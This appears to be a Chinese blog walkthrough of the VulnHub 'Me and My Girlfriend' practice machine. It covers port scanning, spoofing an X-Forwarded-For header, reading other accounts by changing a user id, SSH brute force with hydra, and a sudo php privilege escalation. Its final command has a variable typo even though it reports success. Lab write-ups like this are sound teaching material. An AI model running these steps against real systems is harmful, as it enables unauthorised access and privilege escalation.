vulnhub Me and My Girlfriend靶场

1.信息收集

扫描存活主机

sudo arp-scan -l

扫描主机的开放端口

nmap -p- 192.168.42.156

扫描端口具体开放服务

nmap -p 22,80 -A -sV 192.168.42.156

扫描网站指纹

whatweb 192.168.42.156

2.漏洞挖掘

访问网站

F12，查看html

burp抓包

添加X-Forwarded-For:127.0.0.1

访问成功（因为他要本地访问所以每一个包都要加X-Forwarded-For:127.0.0.1）

开始逛街

发现登录框（弱密码不行）

register注册一个，发现id=12,改id找找其他的账号密码

3.漏洞利用

id=1,找到一个账号，继续

找到的账号密码写在两个文件中

有了账号密码，有22端口，ssh开始爆破

hydra -L 1.txt -P 2.txt ssh://192.168.42.156:22

找到账号

alice

4lic3

登录 ssh alice@192.168.42.156 -p 22

ls -a 查看文件，找到flag1

4.提升权限

常规查看

sudo -l

发现该账户有root（php）命令

在网站上查找php提权

https://gtfobins.github.io/

复制命令，执行命令

CMD="/bin/sh"

sudo php -r "system('$CDM')"

发现root成功

得到flag2.txt

cat flag2.txt

本栏目推荐文章
• CF414B - Mashmokh and ACM
• Center-based 3D Object Detection and Tracking
• MIUI EU ROM install and upgrade
• CF1284E New Year and Castle Construction
• 2023 United Kingdom and Ireland Programming Contest (UKIEPC 2023)
• HDU #6664. Andy and Maze 题解--zhengjun
• CF678F Lena and Queries题解
• 【LeetCode 】练习str_to_date函数；over(rows between CURRENT ROW AND 2 following)实现【当月和接下来2个月】滑动窗口
• [翻译]-Query and Transaction size in MySQL
• CDS Virtual Entities with Dynamics 365 Finance and Operations

靶场 Girlfriend vulnhub and Me靶场girlfriend vulnhub and me-and-my-girlfriend me-and-my-girlfriend girlfriend and me girlfriend手工and me 靶机me-and-my-girlfriend girlfriend流程 靶场haozi xss me 靶场vulnhub dc 靶场vulnhub 靶场vulnhub-xxe漏洞xxe 靶场vulnhub evilbox one